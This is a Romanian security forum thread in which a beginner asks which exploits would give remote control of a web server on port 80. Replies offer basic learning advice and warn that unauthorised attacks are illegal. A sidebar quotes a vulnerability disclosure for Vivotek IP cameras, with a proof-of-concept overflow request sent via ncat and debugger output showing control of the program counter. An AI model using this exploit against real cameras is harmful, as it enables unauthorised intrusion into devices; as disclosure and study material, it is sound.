Jump to content

Recommended Posts

Salut,

 

imi cer scuze pentru ca am postat in sectiunea gresita. Ma gandesc ca aici sunt la sectiunea potrivita. SI revin cu intrebarea: Cine ma poate ajuta sa identific vulnerabilitatiile port-ului 80? Ce exploit-uri pot sa folosesc ca sa obtin controlul remote asupra tintei. Pana acum am incercat tot felul si nu am reusit. Daca imi spune cineva ce imi scapa as fi recunoscator. 

 

Multumesc,

Ossian.

  • Upvote 1

Share this post


Link to post
Share on other sites

Nu exista ce cauti tu! Tiu s-a raspuns in topicul anterior.

Daca ar gasi cineva asa ceva exploitul ar costa cateva sute de miliarde de $.

Edited by yoyois
  • Thanks 1

Share this post


Link to post
Share on other sites

Imi apare ca a fost sters topicul anterior, ma gandesc ca l-am plasat in sectiunea gresita. Atunci, daca ai putea sa-mi spui, incotro sa ma indrept cu cautarea, cu sapatul? Sa stiu macar ca ma indrept in directia care trebuie. 

Multumesc de raspuns.

Share this post


Link to post
Share on other sites
6 minutes ago, Ossian said:

Imi apare ca a fost sters topicul anterior, ma gandesc ca l-am plasat in sectiunea gresita. Atunci, daca ai putea sa-mi spui, incotro sa ma indrept cu cautarea, cu sapatul? Sa stiu macar ca ma indrept in directia care trebuie. 

Multumesc de raspuns.

In nicio directie. E cativa km peste nivelul tau de intelegere.

 

Depinzand de ce vrei tu sa faci pot sa-ti dau niste sfatuti!

Pana acum tot ce a spus tu pana acum e ca vrei sa obtii un shell pe un server apache, fara alte detalii pot doar sa-ti spun ca e mult prea dificil si sa te sfatuiesc sa te indrepti intr-o noua directie cu totul.

De exemplu poti sa crosetezi sau sa pictezi! :)

Share this post


Link to post
Share on other sites

Inca odata, apreciez raspunsul tau, dar mai mult mi-ar placea sa ma lipsesc de el daca raspunsurile tale au tenta aroganta fata de cei incepatori. Oricum, cu toate ca raspunsul tau a fost cum a fost, tot am aflat ceva nou. Am scanat tinta cu nmap si am descoperit ca port-ul 80 este deschis, am incercat multe exploit-uri, si tocmai de aceea a aparut si prima mea intrebare cum sperand ca imi va reduce exploiturile pe care le pot incerca la un numar mai mic.

Un raspuns decent si informativ ar fi frumos din partea oricui, daca tot ai chef de arogante nu te mai obosi sa raspunzi, indiferent cat de stupida ar parea intrebarea incepatorului.

 

Multumesc,

Ossian.

  • Upvote 1

Share this post


Link to post
Share on other sites
52 minutes ago, Ossian said:

Inca odata, apreciez raspunsul tau, dar mai mult mi-ar placea sa ma lipsesc de el daca raspunsurile tale au tenta aroganta fata de cei incepatori. Oricum, cu toate ca raspunsul tau a fost cum a fost, tot am aflat ceva nou. Am scanat tinta cu nmap si am descoperit ca port-ul 80 este deschis, am incercat multe exploit-uri, si tocmai de aceea a aparut si prima mea intrebare cum sperand ca imi va reduce exploiturile pe care le pot incerca la un numar mai mic.

Un raspuns decent si informativ ar fi frumos din partea oricui, daca tot ai chef de arogante nu te mai obosi sa raspunzi, indiferent cat de stupida ar parea intrebarea incepatorului.

 

Multumesc,

Ossian.

Ca sa reduci numarul de exploit-uri ce trebuie incercate, verifici ce versiune de software este folosita. Vei vedea ca un apache cu versiunea la zi, nu o sa ai ce sa ii faci. Pot sa existe exploit-uri pentru o versiune de software, dar care functioneaza numai in anumite situatii. Dupa te duci mai departe, verifici ce hosteaza serverul, o platforma cunoscuta? Cauta-i versiunea si daca exista un exploit pentru acea versiune etc..

Edited by dancezar
  • Thanks 1

Share this post


Link to post
Share on other sites

@Ossian nu exista un exploit pentru port 80, exista exploituri pentru un serviciul care este disponibil pe portul 80 - este o diferenta. In topicul anterior ti s-a recomandat si ti s-au dat link-uri spre materiale care iti explica ce este un port - citeste-le. Iti este greu sa intelegi de ce intrebarea ta este aberanta pentru ca nu ai in bagajul de cunostinte un numar de concepte de baza. Afla ce este si cum este folosit un port, afla ce este si cum functioneaza un server web (e.g. IIS, Apache, Nginx), afla ce este HTTP(S), afla care sunt vulnerabilitatile cele mai comune in sfera aplicatiilor web (OWASP top 10).

 

Ai aici o lista de subiecte din care se da examenul CPSA (entry-level) la CREST - Please login or register to see this link. . Vezi ce subiecte te intereseaza si incearca sa le intelegi.

 

Inca o chestie, daca sistemul pe care tu il impungi cu exploituri nu iti apartine, sau nu ai primit autorizatie de la proprietar sau o persoana cu autoritatea necesara, atunci esti in afara legii.

 

@dancezar "Ca sa reduci suprafata de atac trebuie sa verifici ce versiune de software este folosita" ai o idee gresita despre ce inseamna suprafata de atac.

 

Spor!

  • Like 2

Share this post


Link to post
Share on other sites

Multumesc de raspuns! 

Inteleg si imi accept nivelul la care ma aflu acum, dar fara intrebari, oricat de aberante ar fi ele cum ar fi progres? 

Daca nu exista intrebarea mea aberanta nu as fi obtinut nici raspunsul de la tine. Am inteles oricum la ce te referi si iti dau dreptate, dar daca poti sa faci un bine ori il faci, ori te lipsesti de atitudini de superioritate, infine nu vreau sa intru in conflict cu nimeni.

 

Apreciez,

Ossian.

 

P.S: ,,cel ce intreaba e prost o singura data, cel ce nu intreaba deloc e prost pentru totdeauna,,

  • Upvote 1

Share this post


Link to post
Share on other sites
7 minutes ago, theeternalwanderer said:

@Ossian nu exista un exploit pentru port 80, exista exploituri pentru un serviciul care este disponibil pe portul 80 - este o diferenta. In topicul anterior ti s-a recomandat si ti s-au dat link-uri spre materiale care iti explica ce este un port - citeste-le. Iti este greu sa intelegi de ce intrebarea ta este aberanta pentru ca nu ai in bagajul de cunostinte un numar de concepte de baza. Afla ce este si cum este folosit un port, afla ce este si cum functioneaza un server web (e.g. IIS, Apache, Nginx), afla ce este HTTP(S), afla care sunt vulnerabilitatile cele mai comune in sfera aplicatiilor web (OWASP top 10).

 

Ai aici o lista de subiecte din care se da examenul CPSA (entry-level) la CREST - Please login or register to see this link. . Vezi ce subiecte te intereseaza si incearca sa le intelegi.

 

Inca o chestie, daca sistemul pe care tu il impungi cu exploituri nu iti apartine, sau nu ai primit autorizatie de la proprietar sau o persoana cu autoritatea necesara, atunci esti in afara legii.

 

@dancezar "Ca sa reduci suprafata de atac trebuie sa verifici ce versiune de software este folosita" ai o idee gresita despre ce inseamna suprafata de atac.

 

Spor!

Am folosit termenul gresit:) sorry

Share this post


Link to post
Share on other sites

Ai aici cateva resurse:

 

OSI Model - Please login or register to see this link.

Port - Please login or register to see this link.

Top 10 vulnerabilitati web (OWASP) - Please login or register to see this link.

Let's build a web  server - Please login or register to see this link.

 

Ultimul link, desi discuta cum sa construiesti un web server de la 0, ar trebui sa fie folositor in a intelege cum functioneaza unul.

 

Spor!

  • Thanks 1

Share this post


Link to post
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now

  • Similar Content

    • By OKQL
      Many Vivotek IP cameras suffer from a remote stack overflow vulnerability. Device models include CC8160, CC8370, CC8371, CD8371, FD8166A, FD8166A, FD8166A-N, FD8167A, FD8167A, FD8167AS, FD8167AS, FD8169A, FD8169A, FD8169A, FD8169AS, FD8169AS, FD816B, FD816B, FD816BA, FD816BA, FD816C, FD816C, FD816CA, FD816CA, FD816D, FD8177, FD8179, FD8182, FD8182, FD8182-F1, FD8365A_v2, FD8367A, FD8367A, FD8369A, FD8369A, FD836B, FD836BA, FD836D, FD8377, FD8379, FD8382, FD9171, FD9181, FD9371, FD9381, FE8174_v2, FE8181_v2, FE8182, FE8374_v2, FE8381_v2, FE9181, FE9182, FE9381, FE9382, IB8367A, IB8369A, IB836B, IB836BA, IB836D, IB8377, IB8379, IB8382, IB9371, IB9381, IP8166, IP9171, IP9181, IZ9361, MD8563, MD8564, MD8565, SD9161, SD9361, SD9362, SD9363, SD9364, SD9365, SD9366, and VC8101.
       
      [STX] Subject: Vivotek IP Cameras - Remote Stack Overflow Researcher: bashis <mcw noemail eu> (September-October 2017) PoC: https://github.com/mcw0/PoC Release date: November 13, 2017 Full Disclosure: 43 days Attack Vector: Remote Authentication: Anonymous (no credentials needed) Firmware Vulnerable: Only 2017 versions affected Firmware Patched: October 2017 and higher Device Model: CC8160, CC8370, CC8371, CD8371, FD8166A, FD8166A, FD8166A-N, FD8167A, FD8167A, FD8167AS, FD8167AS, FD8169A, FD8169A, FD8169A, FD8169AS, FD8169AS, FD816B, FD816B, FD816BA, FD816BA, FD816C, FD816C, FD816CA, FD816CA, FD816D, FD8177, FD8179, FD8182, FD8182, FD8182-F1, FD8365A_v2, FD8367A, FD8367A, FD8369A, FD8369A, FD836B, FD836BA, FD836D, FD8377, FD8379, FD8382, FD9171, FD9181, FD9371, FD9381, FE8174_v2, FE8181_v2, FE8182, FE8374_v2, FE8381_v2, FE9181, FE9182, FE9381, FE9382, IB8367A, IB8369A, IB836B, IB836BA, IB836D, IB8377, IB8379, IB8382, IB9371, IB9381, IP8166, IP9171, IP9181, IZ9361, MD8563, MD8564, MD8565, SD9161, SD9361, SD9362, SD9363, SD9364, SD9365, SD9366, VC8101... and possible more Download Updated Firmware: http://www.vivotek.com/firmware/ [Timeline] October 1, 2017: Reported findings with all details to Vivotek Cybersecurity October 2, 2017: First response from Vivotek October 5, 2017: ACK of findings from Vivotek October 11, 2017: Vivotek reported first fixed Firmware October 12, 2017: After request, Vivotek provided samples of fixed Firmware October 17, 2017: Verified fixed Firmware, Vivotek thanking for the help October 30, 2017: Noticed new Firmware released, pinged to get some info about their advisory November 1, 2017: Agreed on publication November 13, 2017 November 9, 2017: Checked few release notes, none mention security fix; pinged Vivotek with the question why not. November 13, 2017: No reply from Vivotek, Full Disclosure as planned. [Details] Vivotek using modified version of Boa/0.94.14rc21, and the vulnerability has been introduced by Vivotek. The stack overflow is triggered by "PUT" or "POST" request: [PUT|POST] /cgi-bin/admin/upgrade.cgi HTTP/1.0\nContent-Length:[20 bytes garbage]BBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIXXXX\n\r\n\r\n However, the absolutely minimal request to trigger the stack overflow is weird, most probably due to quick hack: "[PUT|POST]Content-Length:[20 bytes garbage]BBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIXXXX\n\r\n\r\n" This allows us to insert [JUNK] with 'Good bytes' up to 9182 bytes (0x1FFF) of the request: "[PUT|POST][JUNK]Content-Length[JUNK]:[20 bytes garbage]BBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIXXXX\n\r\n\r\n" Notes: 1. B to I = $R4-$R11; X = $PC 2. Size of request availible in $R3 at the LDMFD 3. Max request size: 9182 bytes (0x1FFF) 4. "Start with "\n" in "\n\r\n\r\n" needed to jump with 0x00xxxxxx (if not $PC will be 0x0dxxxxxx) 5. Space (0x20) after ':' in 'Content-Length:' counting as one char of the 20 bytes 6. Stack not protected with "Stack canaries" 7. Good bytes: 0x01-0x09, 0x0b-0xff; Bad bytes: 0x00, 0x0a; 8. heap: Non-executable + Non-ASLR 9. stack: Non-executable + ASLR [PoC] $ echo -en "POST /cgi-bin/admin/upgrade.cgi HTTP/1.0\nContent-Length:AAAAAAAAAAAAAAAAAAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIXXXX\n\r\n\r\n" | ncat -v 192.168.57.20 80 (gdb) target remote 192.168.57.20:23946 Remote debugging using 192.168.57.20:23946 0x76eb2c5c in ?? () (gdb) c Continuing. Program received signal SIGSEGV, Segmentation fault. 0x58585858 in ?? () (gdb) bt #0 0x58585858 in ?? () #1 0x000188f4 in ?? () Backtrace stopped: previous frame identical to this frame (corrupt stack?) (gdb) i reg r0 0x1 1 r1 0x47210 291344 r2 0x0 0 r3 0x75 117 r4 0x42424242 1111638594 r5 0x43434343 1128481603 r6 0x44444444 1145324612 r7 0x45454545 1162167621 r8 0x46464646 1179010630 r9 0x47474747 1195853639 r10 0x48484848 1212696648 r11 0x49494949 1229539657 r12 0x1 1 sp 0x7e92dac0 0x7e92dac0 lr 0x188f4 100596 pc 0x58585858 0x58585858 cpsr 0x60000010 1610612752 (gdb) $ echo -en "PUTContent-Length:AAAAAAAAAAAAAAAAAAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIXXXX\n\r\n\r\n" | ncat -v 192.168.57.20 80 (gdb) target remote 192.168.57.20:23946 Remote debugging using 192.168.57.20:23946 0x76e82c5c in ?? () (gdb) c Continuing. Program received signal SIGSEGV, Segmentation fault. 0x58585858 in ?? () (gdb) bt #0 0x58585858 in ?? () #1 0x000188f4 in ?? () Backtrace stopped: previous frame identical to this frame (corrupt stack?) (gdb) i reg r0 0x1 1 r1 0x47210 291344 r2 0x0 0 r3 0x4f 79 r4 0x42424242 1111638594 r5 0x43434343 1128481603 r6 0x44444444 1145324612 r7 0x45454545 1162167621 r8 0x46464646 1179010630 r9 0x47474747 1195853639 r10 0x48484848 1212696648 r11 0x49494949 1229539657 r12 0x1 1 sp 0x7ec9cac0 0x7ec9cac0 lr 0x188f4 100596 pc 0x58585858 0x58585858 cpsr 0x60000010 1610612752 (gdb) Have a nice day /bashis [ETX]  
      Please login or register to see this link.
×